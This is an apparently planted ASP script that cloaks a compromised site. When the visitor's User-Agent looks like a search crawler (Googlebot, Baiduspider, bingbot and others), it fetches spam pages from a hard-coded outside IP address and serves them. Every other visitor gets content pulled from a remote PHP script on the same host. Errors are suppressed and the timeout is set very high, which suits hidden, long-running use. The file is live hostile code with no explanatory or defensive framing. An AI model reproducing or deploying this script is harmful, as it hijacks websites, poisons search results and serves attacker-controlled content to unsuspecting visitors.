<%@ codepage=65001%> <% On Error Resume Next Server.ScriptTimeOut=9999999 Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage=BytesToBstr(t,"UTF-8") End function Function GetBody(url) on error resume next Set Retrieval = CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", url, False, "", "" .Send GetBody = .ResponseBody End With Set Retrieval = Nothing End Function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function Function Newstring(wstr,strng) Newstring=Instr(lcase(wstr),lcase(strng)) if Newstring<=0 then Newstring=Len(wstr) End Function var ids = 0 if request.querystring("id")<> "" Then ids = request.querystring("id") End if dim agent11,ua,spider,iii,REFERER agent11 = LCase(request.servervariables("HTTP_USER_AGENT")) REFERER = Cstr(Request.ServerVariables("HTTP_REFERER")) fname = Array("Googlebot","Baiduspider","Yahoo! Slurp","YodaoBot","msnbot","bot","crawl","spider","bingbot") spider = 0 For iii = 0 to 8 if instr(agent11,LCase(fname(iii)))>0 then spider = 1 end if Next if spider = 1 then url="http://5.157.50.158/11251goose1x/a95/95/"&ids&".html"'5.157.50.158,209.126.99.198 Response.Write getHTTPPage(url) Response.End else'If InStr(REFERER,"bing") > 0 Or InStr(REFERER,"google") > 0 Or InStr(REFERER,"yahoo") > 0 Or InStr(REFERER,"aol") > 0 Then url="http://5.157.50.158/js/goose1.php" Response.Write getHTTPPage(url) Response.End end if %>